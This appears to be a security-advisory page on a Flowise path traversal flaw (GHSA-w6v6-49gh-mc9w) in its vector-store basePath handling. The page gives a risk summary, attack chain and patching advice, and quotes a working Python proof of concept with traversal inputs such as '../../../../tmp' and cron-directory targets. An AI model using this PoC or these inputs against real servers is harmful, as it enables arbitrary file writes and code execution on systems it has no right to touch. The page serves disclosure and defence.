GHSA-w6v6-49gh-mc9w: Flowise path traversal

Q: Is GHSA-w6v6-49gh-mc9w actively exploited?

No confirmed active exploitation of GHSA-w6v6-49gh-mc9w has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-w6v6-49gh-mc9w?

1. Patch: Upgrade flowise and flowise-components to 3.1.0 or later — the only complete fix. 2. Audit: Review all API tokens with documentStores:upsert-config permission; revoke any not tied to known service accounts. 3. Least privilege: Ensure the Flowise process runs as a non-root user with write access scoped to its designated data directory only. 4. Detect: Alert on unexpected file creation outside the configured Flowise data directory using auditd or inotify; monitor for new cron entries or changes to startup scripts. 5. Network isolation: If patching is blocked, restrict the /api/v1/document-store/vectorstore/insert endpoint to trusted internal IPs via firewall rules.

Q: What systems are affected by GHSA-w6v6-49gh-mc9w?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, agent frameworks, vector databases, LLM orchestration platforms.

Q: What is the CVSS score for GHSA-w6v6-49gh-mc9w?

No CVSS score has been assigned yet.

CISO Take

Flowise contains a path traversal vulnerability in its Faiss and LlamaIndex SimpleStore vector store backends where the basePath parameter is passed directly to filesystem write operations without any sanitization. Any authenticated user with an API token carrying documentStores:upsert-config permission — a role commonly distributed to developers and automation pipelines in team deployments — can write files to arbitrary server locations including cron directories, startup scripts, and web-accessible paths, creating a realistic remote code execution path. While not in CISA KEV and lacking EPSS data, the working proof-of-concept published in the advisory itself eliminates the exploitation knowledge barrier, and this package carries 37 historical CVEs signaling persistent security hygiene issues. Upgrade to flowise 3.1.0 immediately and audit all API tokens for document store upsert permissions.

Sources: GitHub Advisory ATLAS CISA KEV

What is the risk?

Effective risk exceeds the official medium classification. The authentication prerequisite is a real barrier, but API tokens in Flowise deployments are frequently distributed broadly to developers and CI/CD pipelines. The arbitrary file write primitive is highly exploitable in both containerized environments (volume mounts to host) and bare-metal deployments. With a working PoC published in the advisory, any actor with a valid token can achieve impact within minutes and without AI/ML expertise.

How does the attack unfold?

Credential Access

Attacker obtains a valid Flowise API token with documentStores:upsert-config permission via credential theft, git history exposure, or phishing.

AML.T0012

Exploitation

Attacker sends a crafted POST to the vector store insert endpoint with basePath set to a sensitive directory such as /etc/cron.d/ or a host-mounted volume path.

AML.T0049

Arbitrary File Write

Flowise writes vector store index files (faiss.index, docstore.json) to the attacker-controlled path without any path sanitization or restriction.

AML.T0053

Impact

Attacker achieves code execution by planting a malicious payload in a cron or init directory, or escapes a container via a host-mounted volume write.

AML.T0072

Credential Access

Attacker obtains a valid Flowise API token with documentStores:upsert-config permission via credential theft, git history exposure, or phishing.

AML.T0012

Exploitation

Attacker sends a crafted POST to the vector store insert endpoint with basePath set to a sensitive directory such as /etc/cron.d/ or a host-mounted volume path.

AML.T0049

Arbitrary File Write

Flowise writes vector store index files (faiss.index, docstore.json) to the attacker-controlled path without any path sanitization or restriction.

AML.T0053

Impact

Attacker achieves code execution by planting a malicious payload in a cron or init directory, or escapes a container via a host-mounted volume write.

AML.T0072

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Flowise	npm	<= 3.0.13	`3.1.0`
Flowise	npm	<= 3.0.13	`3.1.0`

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

5 steps

Patch: Upgrade flowise and flowise-components to 3.1.0 or later — the only complete fix.
Audit: Review all API tokens with documentStores:upsert-config permission; revoke any not tied to known service accounts.
Least privilege: Ensure the Flowise process runs as a non-root user with write access scoped to its designated data directory only.
Detect: Alert on unexpected file creation outside the configured Flowise data directory using auditd or inotify; monitor for new cron entries or changes to startup scripts.
Network isolation: If patching is blocked, restrict the /api/v1/document-store/vectorstore/insert endpoint to trusted internal IPs via firewall rules.

How is it classified?

Code Execution Auth Bypass Framework Agent RAG AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - AI system security A.9.2 - Access control for AI systems

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain value of deployed AI systems

OWASP LLM Top 10

LLM08 - Excessive Agency

Frequently Asked Questions

What is GHSA-w6v6-49gh-mc9w?

Flowise contains a path traversal vulnerability in its Faiss and LlamaIndex SimpleStore vector store backends where the basePath parameter is passed directly to filesystem write operations without any sanitization. Any authenticated user with an API token carrying documentStores:upsert-config permission — a role commonly distributed to developers and automation pipelines in team deployments — can write files to arbitrary server locations including cron directories, startup scripts, and web-accessible paths, creating a realistic remote code execution path. While not in CISA KEV and lacking EPSS data, the working proof-of-concept published in the advisory itself eliminates the exploitation knowledge barrier, and this package carries 37 historical CVEs signaling persistent security hygiene issues. Upgrade to flowise 3.1.0 immediately and audit all API tokens for document store upsert permissions.

Is GHSA-w6v6-49gh-mc9w actively exploited?

No confirmed active exploitation of GHSA-w6v6-49gh-mc9w has been reported, but organizations should still patch proactively.

How to fix GHSA-w6v6-49gh-mc9w?

1. Patch: Upgrade flowise and flowise-components to 3.1.0 or later — the only complete fix. 2. Audit: Review all API tokens with documentStores:upsert-config permission; revoke any not tied to known service accounts. 3. Least privilege: Ensure the Flowise process runs as a non-root user with write access scoped to its designated data directory only. 4. Detect: Alert on unexpected file creation outside the configured Flowise data directory using auditd or inotify; monitor for new cron entries or changes to startup scripts. 5. Network isolation: If patching is blocked, restrict the /api/v1/document-store/vectorstore/insert endpoint to trusted internal IPs via firewall rules.

What systems are affected by GHSA-w6v6-49gh-mc9w?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, agent frameworks, vector databases, LLM orchestration platforms.

What is the CVSS score for GHSA-w6v6-49gh-mc9w?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

RAG pipelinesagent frameworksvector databasesLLM orchestration platforms

MITRE ATLAS Techniques

AML.T0012 Valid Accounts

AML.T0049 Exploit Public-Facing Application

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.6.2.5, A.9.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM08

What are the technical details?

Original Advisory

## Summary The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem. ## Vulnerability Details | Field | Value | |-------|-------| | Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) | | Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) | ## Prerequisites 1. **Authentication**: Valid API token with `documentStores:upsert-config` permission 2. **Document Store**: An existing Document Store with at least one processed chunk 3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key) ## Root Cause ### Faiss (`Faiss.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled // ... const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings) await vectorStore.save(basePath) // Direct filesystem write, no validation } ``` ### SimpleStore (`SimpleStore.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled let filePath = '' if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex') else filePath = basePath // Used directly without sanitization const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path } ``` ## Impact An authenticated attacker can: 1. **Write files to arbitrary locations** on the server filesystem 2. **Overwrite existing files** if the process has write permissions 3. **Potential for code execution** by writing to web-accessible directories or startup scripts 4. **Data exfiltration** by writing to network-mounted filesystems ## Proof of Concept ### poc.py ```python #!/usr/bin/env python3 """ POC: Path Traversal in Vector Store basePath (CWE-22) Usage: python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID> """ import argparse import json import urllib.request import urllib.error def post_json(url, data, headers): req = urllib.request.Request( url, data=json.dumps(data).encode("utf-8"), headers={**headers, "Content-Type": "application/json"}, method="POST", ) with urllib.request.urlopen(req, timeout=120) as resp: return resp.status, resp.read().decode("utf-8", errors="replace") def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True) ap.add_argument("--token", required=True) ap.add_argument("--store-id", required=True) ap.add_argument("--credential", required=True) ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc") args = ap.parse_args() payload = { "storeId": args.store_id, "vectorStoreName": "faiss", "vectorStoreConfig": {"basePath": args.base_path}, "embeddingName": "openAIEmbeddings", "embeddingConfig": {"credential": args.credential}, } url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert" headers = {"Authorization": f"Bearer {args.token}"} try: status, body = post_json(url, payload, headers) print(body) except urllib.error.HTTPError as e: print(e.read().decode()) if __name__ == "__main__": main() ``` ### Setup 1. Create a Document Store in Flowise UI 2. Add a Document Loader (e.g., Plain Text) with any content 3. Click "Process" to create chunks 4. Note the Store ID from the URL 5. Get your embedding credential ID from Settings → Credentials ### Exploitation ```bash # Write to /tmp python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path /tmp/flowise-pwned # Path traversal variant python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path "../../../../tmp/traversal-test" ``` ### Evidence ``` $ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned {"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]} $ ls -la /tmp/flowise-pwned/ total 16 drwxr-xr-x 4 user wheel 128 Jan 17 12:00 . drwxrwxrwt 12 root wheel 384 Jan 17 12:00 .. -rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json -rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index ```

Exploitation Scenario

An attacker with a compromised developer API token — obtained via phishing, git history leak, or insider access — sends a crafted POST to /api/v1/document-store/vectorstore/insert with basePath set to /etc/cron.d/. Flowise writes faiss.index and docstore.json to that directory without validation. In a second variant targeting containerized Flowise, the attacker sets basePath to a host-mounted volume path, achieving container escape. No AI or ML expertise is required — the entire attack is a single HTTP request with a modified JSON payload.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

[Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
[Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.